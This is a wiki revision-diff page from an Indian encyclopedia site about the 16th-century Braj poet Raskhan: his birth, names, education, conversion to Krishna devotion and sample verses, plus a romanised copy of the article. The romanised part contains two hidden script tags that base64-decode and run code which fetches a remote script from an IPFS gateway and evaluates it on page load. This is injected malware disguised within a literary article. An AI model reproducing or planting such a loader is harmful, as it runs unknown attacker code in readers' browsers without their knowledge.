Difference between revisions of "रसखान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 32: Line 32:
 
[[चित्र:raskhan-2.jpg|रसखान के दोहे [[महावन]], [[मथुरा]]|thumb|250px]]
 
[[चित्र:raskhan-2.jpg|रसखान के दोहे [[महावन]], [[मथुरा]]|thumb|250px]]
 
'''रसखान''' ([[अंग्रेज़ी]]:Raskhan) का [[हिन्दी साहित्य]] में [[कृष्ण]] भक्त तथा रीतिकालीन कवियों में महत्त्वपूर्ण स्थान है। 'रसखान' को ''रस की ख़ान'' कहा जाता है। इनके काव्य में भक्ति, श्रृगांर रस दोनों प्रधानता से मिलते हैं। रसखान कृष्ण भक्त हैं और प्रभु के सगुण और निर्गुण निराकार रूप के प्रति श्रद्धालु हैं। रसखान के सगुण कृष्ण लीलाएं करते हैं। यथा- बाललीला, [[रासलीला]], फागलीला, कुंजलीला आदि। उन्होंने अपने काव्य की सीमित परिधी में इन असीमित लीलाओं का बहुत सूक्ष्म वर्णन किया है। [[भारतेन्दु हरिश्चन्द्र]] ने जिन मुस्लिम हरिभक्तों के लिये कहा था, "इन मुसलमान हरिजनन पर कोटिन हिन्दू वारिए" उनमें "रसखान" का नाम सर्वोपरि है। सैय्यद इब्राहीम "रसखान" का जन्म उपलब्ध स्रोतों के अनुसार सन् 1533 से 1558 के बीच कभी हुआ होगा। [[अकबर]] का राज्यकाल 1556-1605 है, ये लगभग अकबर के समकालीन हैं। जन्मस्थान 'पिहानी' कुछ लोगों के मतानुसार [[दिल्ली]] के समीप है। कुछ और लोगों के मतानुसार यह 'पिहानी' [[उत्तर प्रदेश]] के [[हरदोई ज़िला|हरदोई ज़िले]] में है। मृत्यु के बारे में कोई प्रामाणिक तथ्य नहीं मिलते हैं। रसखान ने [[भागवत पुराण|भागवत]] का अनुवाद [[फ़ारसी भाषा|फ़ारसी]] में भी किया।
 
'''रसखान''' ([[अंग्रेज़ी]]:Raskhan) का [[हिन्दी साहित्य]] में [[कृष्ण]] भक्त तथा रीतिकालीन कवियों में महत्त्वपूर्ण स्थान है। 'रसखान' को ''रस की ख़ान'' कहा जाता है। इनके काव्य में भक्ति, श्रृगांर रस दोनों प्रधानता से मिलते हैं। रसखान कृष्ण भक्त हैं और प्रभु के सगुण और निर्गुण निराकार रूप के प्रति श्रद्धालु हैं। रसखान के सगुण कृष्ण लीलाएं करते हैं। यथा- बाललीला, [[रासलीला]], फागलीला, कुंजलीला आदि। उन्होंने अपने काव्य की सीमित परिधी में इन असीमित लीलाओं का बहुत सूक्ष्म वर्णन किया है। [[भारतेन्दु हरिश्चन्द्र]] ने जिन मुस्लिम हरिभक्तों के लिये कहा था, "इन मुसलमान हरिजनन पर कोटिन हिन्दू वारिए" उनमें "रसखान" का नाम सर्वोपरि है। सैय्यद इब्राहीम "रसखान" का जन्म उपलब्ध स्रोतों के अनुसार सन् 1533 से 1558 के बीच कभी हुआ होगा। [[अकबर]] का राज्यकाल 1556-1605 है, ये लगभग अकबर के समकालीन हैं। जन्मस्थान 'पिहानी' कुछ लोगों के मतानुसार [[दिल्ली]] के समीप है। कुछ और लोगों के मतानुसार यह 'पिहानी' [[उत्तर प्रदेश]] के [[हरदोई ज़िला|हरदोई ज़िले]] में है। मृत्यु के बारे में कोई प्रामाणिक तथ्य नहीं मिलते हैं। रसखान ने [[भागवत पुराण|भागवत]] का अनुवाद [[फ़ारसी भाषा|फ़ारसी]] में भी किया।
{|
+
==जीवन परिचय==
|मानुष हौं तो वही रसखानि बसौं गोकुल गाँव के ग्वालन।
+
रसखान के जन्म के संबंध में विद्वानों में मतभेद पाया जाता है। अनेक विद्वानों ने इनका जन्म संवत् 1615 ई. माना है और कुछ विद्वानों ने 1630 ई. माना है। रसखान स्वयं बताते हैं कि गदर के कारण दिल्ली श्मशान बन चुकी थी, तब उसे छोड़कर वे ब्रज चले गये। ऐतिहासिक साक्ष्य के आधार पर पता चलता है कि उपर्युक्त गदर सन् 1613 ई. में हुआ था। उनकी बात से ऐसा प्रतीक होता है कि वह गदर के समय व्यस्क थे और उनका जन्म गदर के पहले ही हुआ होगा। रसखान का जन्म संवत् 1590 ई. मानना अधिक समीचीन प्रतीत होता है। भवानी शंकर याज्ञिक ने भी यही माना है। अनेक तथ्यों के आधार पर उन्होंने अपने इस मत की पुष्टि भी की है। ऐतिहासिक ग्रंथों के आधार पर भी यही तथ्य सामने आता है। यह मानना अधिक प्रभावशाली प्रतीत होता है कि रसखान का जन्म 1590 ई. में हुआ होगा।<ref name="IGNCA">{{cite web |url=http://www.ignca.nic.in/coilnet/raskhn.htm |title=रसखान |accessmonthday=11 मई |accessyear=2012 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=www.ignca.nic.in |language=हिन्दी }}</ref>
|-
+
====जन्म स्थान====
|जो पसु हौं तो कहा बसु मेरो चरौं नित नन्द की धेनु मंझारन।
+
रसखान के जन्म स्थान के विषय में अनेक विद्वानों ने अनेक मत प्रस्तुत किए हैं। कई तो रसखान के जन्म स्थान पिहानी अथवा दिल्ली को बताते हैं, किंतु यह कहा जाता है कि दिपाली शब्द का प्रयोग उनके काव्य में केवल एक बार ही मिलता है। जैसा कि पहले लिखा गया कि रसखान ने गदर के कारण [[दिल्ली]] को श्मशान बताया है। उसके बाद की जिंदगी उसकी [[मथुरा]] में गुजरी। शिवसिंह सरोज तथा हिंदी साहित्य के प्रथम इतिहास तथा ऐतिहासिक तथ्यों एवं अन्य पुष्ट प्रमाणों के आधार पर रसखान की जन्म-भूमि पिहानी ज़िला हरदोई माना जाए। पिहानी और बिलग्राम ऐसी जगह हैं, जहाँ हिंदी के बड़े-बड़े एवं उत्तम कोटि के मुसलमान कवि पैदा हुए।<ref name="IGNCA"/>
|-
+
====नाम एवं उपनाम====
|पाहन हौं तो वही गिरि को जो धरयौ कर छत्र पुरन्दर धारन।
+
जन्म स्थान तथा जन्म काल की तरह रसखान के नाम एवं उपनाम के संबंध में भी अनेक मत प्रस्तुत किए गए हैं। [[हजारी प्रसाद द्विवेदी]] जी ने अपनी पुस्तक में रसखान के दो नाम लिखे हैं:- सैय्यद इब्राहिम और सुजान रसखान। जबकि सुजान रसखान की एक रचना का नाम है। हालांकि रसखान का असली नाम सैयद इब्राहिम था और "खान' उसकी उपाधि थी। नवलगढ़ के राजकुमार संग्रामसिंह जी द्वारा प्राप्त रसखान के चित्र पर [[नागरी लिपि]] के साथ- साथ [[फ़ारसी लिपि]] में भी एक स्थान पर "रसखान' तथा दूसरे स्थान पर "रसखाँ' ही लिखा पाया गया है। उपर्युक्त सबूतों के आधार पर कहा जा सकता है कि रसखान ने अपना नाम "रसखान' सिर्फ इसलिए रखा था कि वह कविता में इसका प्रयोग कर सके। फ़ारसी कवियों की नाम चसिप्त में रखने की परंपरा का पालन करते हुए रसखान ने भी अपने नाम खाने के पहले "रस' लगाकर स्वयं को रस से भरे खान या रसीले खान की धारणा के साथ काव्य- रचना की। उनके जीवन में रस की कमी न थी। पहले लौकिक रस का आस्वादन करते रहे, फिर अलौकिक रस में लीन होकर काव्य रचना करने लगे। एक स्थान पर उनके काव्य में "रसखाँ' शब्द का प्रयोग भी मिलता है।
|-
+
<poem>नैन दलालनि चौहटें म मानिक पिय हाथ।
|जो खग हौं बसेरो करौं मिल [[कालिन्दी नदी|कालिन्दी]]-कूल-कदम्ब की डारन।।
+
"रसखाँ' ढोल बजाई के बेचियों हिय जिय साथ।।</poem>
|}
+
उपर्युक्त साक्ष्यों के आधार पर कहा जा सकता है कि उनका नाम सैय्यद इब्राहिम तथा उपनाम "रसखान' था।<ref name="IGNCA"/>
===बाल्य वर्णन===
+
====बाल्यकाल तथा शिक्षा====
{|
+
रसखान एक जागीरदार [[पिता]] के [[पुत्र]] थे। इसलिए इनका लालन पालन बड़े लाड़- प्यार से हुआ माना जाता है। ऐसा इसलिए कहा जाता है कि उनके काव्य में किसी विशेष प्रकार की कटुता का सरासर अभाव पाया जाता है। एक संपन्न परिवार में पैदा होने के कारण उनकी शिक्षा अच्छी और उच्च कोटि की गई थी। उनकी यह विद्वत्ता उनके काव्य की साधिकार अभिव्यक्ति में जग जाहिर होते हैं। रसखान को फ़ारसी हिंदी एवं संस्कृति का अच्छा ज्ञान था। फ़ारसी में उन्होंने "[[श्रीमद्भागवत]]' का अनुवाद करके यह साबित कर दिया था। इसको देख कर इस बात का अभास होता है कि वह फ़ारसी और हिंदी भाषाओं का अच्छा वक्ता होंगे। रसखान ने अपना बाल्य जीवन अपार सुख- सुविधाओं में गुजारा होगा। उन्हें पढ़ने के लिए किसी मकतब में जाने की आवश्यकता नहीं पड़ी होगी।<ref name="IGNCA"/>
|धूरि भरे अति शोभित श्याम जू, तैसी बनी सिर सुन्दर चोटी।
+
 
|-
 
|खेलत खात फिरैं अँगना, पग पैंजनिया कटि पीरी कछौटी।।
 
|-
 
|वा छवि को रसखान विलोकत, वारत काम कलानिधि कोटी।
 
|-
 
|काग के भाग कहा कहिए हरि हाथ सों ले गयो माखन रोटी।।
 
|}
 
 
==व्यक्तित्व==
 
==व्यक्तित्व==
 
{{मुख्य|रसखान व्यक्तित्व और कृतित्व}}
 
{{मुख्य|रसखान व्यक्तित्व और कृतित्व}}
अब्राहम जार्ज ग्रियर्सन ने लिखा है सैयद इब्राहीम उपनाम रसखान कवि, हरदोई ज़िले के अंतर्गत पिहानी के रहने वाले, जन्म काल 1573 ई.। यह पहले [[मुसलमान]] थे। बाद में वैष्णव होकर [[ब्रज]] में रहने लगे थे। इनका वर्णन 'भक्तमाल' में है। इनके एक शिष्य [[कादिर बख्श]] हुए। सांसारिक प्रेम की सीढ़ी से चढ़कर रसखान भगवदीय प्रेम की सबसे ऊँची मंजिल तक कैसे पहुँचे, इस संबंध की दो आख्यायिकाएँ प्रचलित हैं। 'वार्ता' में लिखा है कि रसखानि पहले एक बनिये के लड़के पर अत्यंत आसक्त थे। उसका जूठा तक यह खा लेते थे। एक दिन चार वैष्णव बैठे बात कर रहे थे कि भगवान्‌ श्रीनाथ जी से प्रीति ऐसी जोड़नी चाहिए, जैसे प्रीति रसखान की उस बनिये के लड़के पर है। रसखान ने रास्ते में जाते हुए यह बात सुन ली। उन्होंने पूछा कि 'आपके श्रीनाथ जी का स्वरूप कैसा है?' वैष्णवों ने श्रीनाथ जी का एक सुंदर चित्र उन्हें दिखाया। चित्रपट में भगवान्‌ की अनुपम छवि देखकर रसखानि का मन उधर से फिर गया। प्रेम की विह्वल दशा में श्रीनाथ जी का दर्शन करने यह गोकुल पहुँचे। गोसाई विट्ठलदास जी ने इनके अंतर के परात्पर प्रेम को पहचानकर इन्हें अपनी शरण में ले लिया। रसखानि श्रीनाथ जी के अनन्य भक्त हो गए।
+
अब्राहम जार्ज ग्रियर्सन ने लिखा है सैयद इब्राहीम उपनाम रसखान कवि, हरदोई ज़िले के अंतर्गत पिहानी के रहने वाले, जन्म काल 1573 ई.। यह पहले [[मुसलमान]] थे। बाद में वैष्णव होकर [[ब्रज]] में रहने लगे थे। इनका वर्णन 'भक्तमाल' में है। इनके एक शिष्य [[कादिर बख्श]] हुए। सांसारिक प्रेम की सीढ़ी से चढ़कर रसखान भगवदीय प्रेम की सबसे ऊँची मंजिल तक कैसे पहुँचे, इस संबंध की दो आख्यायिकाएँ प्रचलित हैं। 'वार्ता' में लिखा है कि रसखानि पहले एक बनिये के लड़के पर अत्यंत आसक्त थे। उसका जूठा तक यह खा लेते थे। एक दिन चार वैष्णव बैठे बात कर रहे थे कि भगवान्‌ श्रीनाथ जी से प्रीति ऐसी जोड़नी चाहिए, जैसे प्रीति रसखान की उस बनिये के लड़के पर है। रसखान ने रास्ते में जाते हुए यह बात सुन ली। उन्होंने पूछा कि 'आपके श्रीनाथ जी का स्वरूप कैसा है?' वैष्णवों ने श्रीनाथ जी का एक सुंदर चित्र उन्हें दिखाया। चित्रपट में भगवान्‌ की अनुपम छवि देखकर रसखानि का मन उधर से फिर गया। प्रेम की विह्वल दशा में श्रीनाथ जी का दर्शन करने यह गोकुल पहुँचे। गोसाई विट्ठलदास जी ने इनके अंतर के परात्पर प्रेम को पहचानकर इन्हें अपनी शरण में ले लिया। रसखानि श्रीनाथ जी के अनन्य भक्त हो गए।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=रसखान: व्यक्तित्व और कृतित्व |लेखक=डॉ. माजदा असद |अनुवादक= |आलोचक= |प्रकाशक=प्रेम प्रकाशन मन्दिर, दिल्ली |संकलन= |संपादन= |पृष्ठ संख्या= |url=|ISBN=}}</ref>
 +
 
 
==कविताएँ==
 
==कविताएँ==
रसखान की कविताओं के दो संग्रह प्रकाशित हुए हैं - 'सुजान रसखान' और 'प्रेमवाटिका'। 'सुजान रसखान' में 139 सवैये और कवित्त है। 'प्रेमवाटिका' में 52 दोहे हैं, जिनमें प्रेम का बड़ा अनूठा निरूपण किया गया है। रसखानि के सरस सवैय सचमुच बेजोड़ हैं। [[सवैया]] का दूसरा नाम 'रसखान' भी पड़ गया है। शुद्ध [[ब्रजभाषा]] में रसखानि ने प्रेमभक्ति की अत्यंत सुंदर प्रसादमयी रचनाएँ की हैं। यह एक उच्च कोटि के भक्त कवि थे, इसमें संदेह नहीं।  
+
रसखान की कविताओं के दो संग्रह प्रकाशित हुए हैं- 'सुजान रसखान' और 'प्रेमवाटिका'। 'सुजान रसखान' में 139 सवैये और कवित्त है। 'प्रेमवाटिका' में 52 दोहे हैं, जिनमें प्रेम का बड़ा अनूठा निरूपण किया गया है। रसखानि के सरस सवैय सचमुच बेजोड़ हैं। [[सवैया]] का दूसरा नाम 'रसखान' भी पड़ गया है। शुद्ध [[ब्रजभाषा]] में रसखानि ने प्रेमभक्ति की अत्यंत सुंदर प्रसादमयी रचनाएँ की हैं। यह एक उच्च कोटि के भक्त कवि थे, इसमें संदेह नहीं।  
 +
<blockquote><poem>मानुष हौं तो वही रसखानि बसौं गोकुल गाँव के ग्वालन।
 +
जो पसु हौं तो कहा बसु मेरो चरौं नित नन्द की धेनु मंझारन।
 +
पाहन हौं तो वही गिरि को जो धरयौ कर छत्र पुरन्दर धारन।
 +
जो खग हौं बसेरो करौं मिल [[कालिन्दी नदी|कालिन्दी]]-कूल-कदम्ब की डारन।।</poem></blockquote>
 +
==साहित्यिक विशेषताएँ==
 +
सैय्यद इब्राहिम रसखान के काव्य के आधार भगवान [[श्रीकृष्ण]] हैं। रसखान ने उनकी ही लीलाओं का गान किया है। उनके पूरे काव्य- रचना में भगवान श्रीकृष्ण की भक्ति की गई है। इससे भी आगे बढ़ते हुए रसखान ने सुफिज्म (तसव्वुफ) को भी भगवान श्रीकृष्ण के माध्यम से ही प्रकट किया है। इससे यह कहा जा सकता है कि वे सामाजिक एवं आपसी सौहार्द के कितने हिमायती थे।
 +
====होली वर्णन====
 +
कृष्ण भक्त कवियों की तरह रसखान ने भी कृष्ण जी की उल्लासमयी लीलाओं का विस्तारपूर्वक वर्णन किया है। उन्होंने अपने पदों में कृष्ण को [[गोपी|गोपियों]] के साथ [[होली]] खेलते हुए दिखाया गया है, जिनमें कृष्ण गोपियों को किंभगो देते हैं। गोपियाँ [[फाल्गुन]] के साथ कृष्ण के अवगुणों की चर्चा करते हुए कहती हैं कि कृष्ण ने होली खेल कर हम में काम- वासना जागृत कर दी हैं। पिचकारी तथा घमार से हमें किंभगो दिया है। इस तरह हमारा हार भी टूट गया है। रसखान अपने पद में कृष्ण को मर्यादा हीन चित्रित किया है:-
 +
 
 +
<poem>आवत लाल गुलाल लिए मग सुने मिली इक नार नवीनी।
 +
त्यों रसखानि जगाइ हिये यटू मोज कियो मन माहि अधीनी।
 +
सारी फटी सुकुमारी हटी, अंगिया दरकी सरकी रंग भीनी।
 +
लाल गुलाल लगाइ के अंक रिझाइ बिदा करि दीनी।</poem>
 +
====हरि शंकरी====
 +
रसखान हरि और शंकर को अभिन्न मानते थे-
 +
<poem>इक और किरीट बसे दुसरी दिसि लागन के गन गाजत री।
 +
मुरली मधुरी धुनि अधिक ओठ पे अधिक नाद से बाजत री।
 +
रसखानि पितंबर एक कंधा पर वघंबर राजत री।
 +
कोड देखड संगम ले बुड़की निकस याह भेख सों छाजत री।</poem>
 +
 
 +
====शिव स्तुति====
 +
रसखान के पदों में कृष्ण के अलावा कई और [[देवता|देवताओं]] का जिक्र मिलता है। शिव की सहज कृपालुता की ओर संकेत करते हुए कहते हैं कि उनकी कृपा दृष्टि संपूर्ण दुखों का नाश करने वाली है-
 +
 
 +
यह देखि धतूरे के पात चबात औ गात सों धूलि लगावत है।
 +
चहुँ ओर जटा अंटकै लटके फनि सों कफनी पहरावत हैं।
 +
रसखानि गेई चितवैं चित दे तिनके दुखदुंद भाजावत हैं।
 +
गजखाल कपाल की माल विसाल सोगाल बजावत आवत है।
 +
 
 +
====गंगा गरिमा====
 +
गंगा की महिमा के वर्णन की परिपाटी का अनुसरण करते हुए रसखान ने भी गंगा की स्तूति में एक पद ही सही, मगर लिखा है --
 +
<poem>बेद की औषद खाइ कछु न करै बहु संजम री सुनि मोसें।
 +
तो जलापान कियौ रसखानि सजीवन जानि लियो रस तेर्तृ।
 +
एरी सुघामई भागीरथी नित पथ्य अपथ्य बने तोहिं पोसे।
 +
आक धतूरो चाबत फिरे विष खात फिरै सिव तेऐ भरोसें।</poem>
 +
 
 +
====प्रेम तथा भक्ति====
 +
प्रेम तथा भक्ति के क्षेत्र में भी रसखान ने प्रेम का विषद् और व्यापक चित्रण किया है। [[राधा]] और [[कृष्ण]] प्रेम वाटिका के मासी मासिन हैं। प्रेम का मार्ग कमल तंतू के समान नागुक और अतिधार के समान कठिन है। अत्यंत सीधा भी है और टेढ़ा भी है। बिना प्रेमानुभूति के आनंद का अनुभव नहीं होता। बिना प्रेम का बीज [[हृदय]] में नहीं उपजता है। ज्ञान, कर्म, उपासना सब अहंकार के मूल हैं। बिना प्रेम के दृढ़ निश्चय नहीं होता। रसखान द्वारा प्रतिपादित प्रेम आदर्शों से अनुप्रेरित है। रसखान ने प्रेम का स्पष्ट रुप में चित्रण किया है। प्रेम की परिभाषा, पहचान, प्रेम का प्रभाव, प्रेम प्रति के साधन एवं प्रेम की पराकाष्ठा प्रेम वाटिका में दिखाई पड़ती है। रसखान द्वारा प्रतिपादित प्रेम लौकिक प्रेम से बहुत ऊँचा है। रसखान ने 52 दोहों में प्रेम का जो स्वरुप प्रस्तुत किया है, वह पूर्णतया मौलिक हैं।
 +
 
 +
<poem>वा लकुटी अरु कामरिया पर राज तिहूँपुर को तजि डारौ।
 +
आठहु सिद्धि नवाँ निधि को सुख नंद की गाइ चराई बिसरौ।
 +
ए रसखानि गवै इन नैनन ते ब्ज के बन- बाग निहारै।
 +
कोटिका यह कलघोत के धाम करील की कुंजन उपावारौ।</poem>
 +
 
 +
===बाल्य वर्णन===
 +
<blockquote><poem>धूरि भरे अति शोभित श्याम जू, तैसी बनी सिर सुन्दर चोटी।
 +
खेलत खात फिरैं अँगना, पग पैंजनिया कटि पीरी कछौटी।।
 +
वा छवि को रसखान विलोकत, वारत काम कलानिधि कोटी।
 +
काग के भाग कहा कहिए हरि हाथ सों ले गयो माखन रोटी।।</poem></blockquote>
 
====कला पक्ष====
 
====कला पक्ष====
 
{{मुख्य|रसखान का कला-पक्ष}}
 
{{मुख्य|रसखान का कला-पक्ष}}
Line 62: Line 104:
 
{{मुख्य|रसखान का भाव-पक्ष}}
 
{{मुख्य|रसखान का भाव-पक्ष}}
 
रसखान के काव्य में छ: स्थायी भावों की निबंधना मिलती है- रति, निर्वेद, उत्साह, हास, वात्सल्य और भक्ति। यह बात ध्यान देने योग्य है कि उन्होंने परंपराप्रथिता चार स्थायी भावों को ही गौरव दिया है, जिनमें अन्यतम भाव रति का है। क्रोध, जुगुप्ता, विस्मय, शोक और भय की उपेक्षा का मूल कारण यह प्रतीत होता है कि इन भावों का रति से मेल नहीं है। रसखान प्रेमी जीव थे, अतएव उन्होंने अपनी कविता में तीन प्रकार के रति भावों की रति, वात्सल्य और भक्ति की व्यंजना की; जो भाव इनमें विशेष सहायक हो सकते थे उन्हें यथास्थान अभिव्यक्ति किया। दूसरा कारण यह भी है कि उनकी रचना मुक्तक है; अतएव प्रबन्ध काव्य की भांति उसमें सभी प्रकार के भावों का सन्निवेश आवश्यक भी नहीं है।
 
रसखान के काव्य में छ: स्थायी भावों की निबंधना मिलती है- रति, निर्वेद, उत्साह, हास, वात्सल्य और भक्ति। यह बात ध्यान देने योग्य है कि उन्होंने परंपराप्रथिता चार स्थायी भावों को ही गौरव दिया है, जिनमें अन्यतम भाव रति का है। क्रोध, जुगुप्ता, विस्मय, शोक और भय की उपेक्षा का मूल कारण यह प्रतीत होता है कि इन भावों का रति से मेल नहीं है। रसखान प्रेमी जीव थे, अतएव उन्होंने अपनी कविता में तीन प्रकार के रति भावों की रति, वात्सल्य और भक्ति की व्यंजना की; जो भाव इनमें विशेष सहायक हो सकते थे उन्हें यथास्थान अभिव्यक्ति किया। दूसरा कारण यह भी है कि उनकी रचना मुक्तक है; अतएव प्रबन्ध काव्य की भांति उसमें सभी प्रकार के भावों का सन्निवेश आवश्यक भी नहीं है।
 
 
====रस संयोजन====
 
====रस संयोजन====
 
{{मुख्य|रसखान का रस संयोजन}}
 
{{मुख्य|रसखान का रस संयोजन}}
Line 90: Line 131:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==बाहरी कड़ियाँ==
 +
*[http://www.kavitakosh.org/kk/index.php?title=%E0%A4%B0%E0%A4%B8%E0%A4%96%E0%A4%BE%E0%A4%A8 रसखान की कविताएँ]
 +
*[http://hindibhashi.wordpress.com/%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6%E0%A5%80-%E0%A4%B8%E0%A4%BE%E0%A4%B9%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%AF/%E0%A4%95%E0%A4%B5%E0%A4%BF%E0%A4%97%E0%A4%A3/%E0%A4%B0%E0%A4%B8%E0%A4%96%E0%A4%BE%E0%A4%A8-%E0%A4%95%E0%A5%87-%E0%A4%A6%E0%A5%8B%E0%A4%B9%E0%A5%87/ रसखान के दोहे]
 +
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{रसखान2}}{{भारत के कवि}}{{रसखान}}
 
{{रसखान2}}{{भारत के कवि}}{{रसखान}}

Revision as of 10:44, 11 May 2012

rasakhan
poora nam saiyyad ibrahim (rasakhan)
janm sanh 1533 se 1558 bich (lagabhag)
janm bhoomi pihani, haradoee zila, uttar pradesh
karm bhoomi mahavan (mathura)
karm-kshetr krishna bhakti kavy
vishay sagun krishnabhakti
bhasha sadharan braj bhasha
vishesh yogadan prakriti varnan, krishnabhakti
nagarikata bharatiy
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

[[chitr:raskhan-2.jpg|rasakhan ke dohe mahavan, mathura|thumb|250px]] rasakhan (aangrezi:Raskhan) ka hindi sahity mean krishna bhakt tatha ritikalin kaviyoan mean mahattvapoorn sthan hai. 'rasakhan' ko ras ki khan kaha jata hai. inake kavy mean bhakti, shrrigaanr ras donoan pradhanata se milate haian. rasakhan krishna bhakt haian aur prabhu ke sagun aur nirgun nirakar roop ke prati shraddhalu haian. rasakhan ke sagun krishna lilaean karate haian. yatha- balalila, rasalila, phagalila, kuanjalila adi. unhoanne apane kavy ki simit paridhi mean in asimit lilaoan ka bahut sookshm varnan kiya hai. bharatendu harishchandr ne jin muslim haribhaktoan ke liye kaha tha, "in musalaman harijanan par kotin hindoo varie" unamean "rasakhan" ka nam sarvopari hai. saiyyad ibrahim "rasakhan" ka janm upalabdh srotoan ke anusar sanh 1533 se 1558 ke bich kabhi hua hoga. akabar ka rajyakal 1556-1605 hai, ye lagabhag akabar ke samakalin haian. janmasthan 'pihani' kuchh logoan ke matanusar dilli ke samip hai. kuchh aur logoan ke matanusar yah 'pihani' uttar pradesh ke haradoee zile mean hai. mrityu ke bare mean koee pramanik tathy nahian milate haian. rasakhan ne bhagavat ka anuvad farasi mean bhi kiya.

jivan parichay

rasakhan ke janm ke sanbandh mean vidvanoan mean matabhed paya jata hai. anek vidvanoan ne inaka janm sanvath 1615 ee. mana hai aur kuchh vidvanoan ne 1630 ee. mana hai. rasakhan svayan batate haian ki gadar ke karan dilli shmashan ban chuki thi, tab use chho dakar ve braj chale gaye. aitihasik sakshy ke adhar par pata chalata hai ki uparyukt gadar sanh 1613 ee. mean hua tha. unaki bat se aisa pratik hota hai ki vah gadar ke samay vyask the aur unaka janm gadar ke pahale hi hua hoga. rasakhan ka janm sanvath 1590 ee. manana adhik samichin pratit hota hai. bhavani shankar yajnik ne bhi yahi mana hai. anek tathyoan ke adhar par unhoanne apane is mat ki pushti bhi ki hai. aitihasik granthoan ke adhar par bhi yahi tathy samane ata hai. yah manana adhik prabhavashali pratit hota hai ki rasakhan ka janm 1590 ee. mean hua hoga.[1]

janm sthan

rasakhan ke janm sthan ke vishay mean anek vidvanoan ne anek mat prastut kie haian. kee to rasakhan ke janm sthan pihani athava dilli ko batate haian, kiantu yah kaha jata hai ki dipali shabd ka prayog unake kavy mean keval ek bar hi milata hai. jaisa ki pahale likha gaya ki rasakhan ne gadar ke karan dilli ko shmashan bataya hai. usake bad ki jiandagi usaki mathura mean gujari. shivasianh saroj tatha hiandi sahity ke pratham itihas tatha aitihasik tathyoan evan any pusht pramanoan ke adhar par rasakhan ki janm-bhoomi pihani zila haradoee mana jae. pihani aur bilagram aisi jagah haian, jahaan hiandi ke b de-b de evan uttam koti ke musalaman kavi paida hue.[1]

nam evan upanam

janm sthan tatha janm kal ki tarah rasakhan ke nam evan upanam ke sanbandh mean bhi anek mat prastut kie ge haian. hajari prasad dvivedi ji ne apani pustak mean rasakhan ke do nam likhe haian:- saiyyad ibrahim aur sujan rasakhan. jabaki sujan rasakhan ki ek rachana ka nam hai. halaanki rasakhan ka asali nam saiyad ibrahim tha aur "khan' usaki upadhi thi. navalagadh ke rajakumar sangramasianh ji dvara prapt rasakhan ke chitr par nagari lipi ke sath- sath farasi lipi mean bhi ek sthan par "rasakhan' tatha doosare sthan par "rasakhaan' hi likha paya gaya hai. uparyukt sabootoan ke adhar par kaha ja sakata hai ki rasakhan ne apana nam "rasakhan' sirph isalie rakha tha ki vah kavita mean isaka prayog kar sake. farasi kaviyoan ki nam chasipt mean rakhane ki paranpara ka palan karate hue rasakhan ne bhi apane nam khane ke pahale "ras' lagakar svayan ko ras se bhare khan ya rasile khan ki dharana ke sath kavy- rachana ki. unake jivan mean ras ki kami n thi. pahale laukik ras ka asvadan karate rahe, phir alaukik ras mean lin hokar kavy rachana karane lage. ek sthan par unake kavy mean "rasakhaan' shabd ka prayog bhi milata hai.

nain dalalani chauhatean m manik piy hath.
"rasakhaan' dhol bajaee ke bechiyoan hiy jiy sath..

uparyukt sakshyoan ke adhar par kaha ja sakata hai ki unaka nam saiyyad ibrahim tatha upanam "rasakhan' tha.[1]

balyakal tatha shiksha

rasakhan ek jagiradar pita ke putr the. isalie inaka lalan palan b de la d- pyar se hua mana jata hai. aisa isalie kaha jata hai ki unake kavy mean kisi vishesh prakar ki katuta ka sarasar abhav paya jata hai. ek sanpann parivar mean paida hone ke karan unaki shiksha achchhi aur uchch koti ki gee thi. unaki yah vidvatta unake kavy ki sadhikar abhivyakti mean jag jahir hote haian. rasakhan ko farasi hiandi evan sanskriti ka achchha jnan tha. farasi mean unhoanne "shrimadbhagavat' ka anuvad karake yah sabit kar diya tha. isako dekh kar is bat ka abhas hota hai ki vah farasi aur hiandi bhashaoan ka achchha vakta hoange. rasakhan ne apana baly jivan apar sukh- suvidhaoan mean gujara hoga. unhean padhane ke lie kisi makatab mean jane ki avashyakata nahian p di hogi.[1]

vyaktitv

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

abraham jarj griyarsan ne likha hai saiyad ibrahim upanam rasakhan kavi, haradoee zile ke aantargat pihani ke rahane vale, janm kal 1573 ee.. yah pahale musalaman the. bad mean vaishnav hokar braj mean rahane lage the. inaka varnan 'bhaktamal' mean hai. inake ek shishy kadir bakhsh hue. saansarik prem ki sidhi se chadhakar rasakhan bhagavadiy prem ki sabase ooanchi manjil tak kaise pahuanche, is sanbandh ki do akhyayikaean prachalit haian. 'varta' mean likha hai ki rasakhani pahale ek baniye ke l dake par atyant asakt the. usaka jootha tak yah kha lete the. ek din char vaishnav baithe bat kar rahe the ki bhagavanh‌ shrinath ji se priti aisi jo dani chahie, jaise priti rasakhan ki us baniye ke l dake par hai. rasakhan ne raste mean jate hue yah bat sun li. unhoanne poochha ki 'apake shrinath ji ka svaroop kaisa hai?' vaishnavoan ne shrinath ji ka ek suandar chitr unhean dikhaya. chitrapat mean bhagavanh‌ ki anupam chhavi dekhakar rasakhani ka man udhar se phir gaya. prem ki vihval dasha mean shrinath ji ka darshan karane yah gokul pahuanche. gosaee vitthaladas ji ne inake aantar ke paratpar prem ko pahachanakar inhean apani sharan mean le liya. rasakhani shrinath ji ke anany bhakt ho ge.[2]

kavitaean

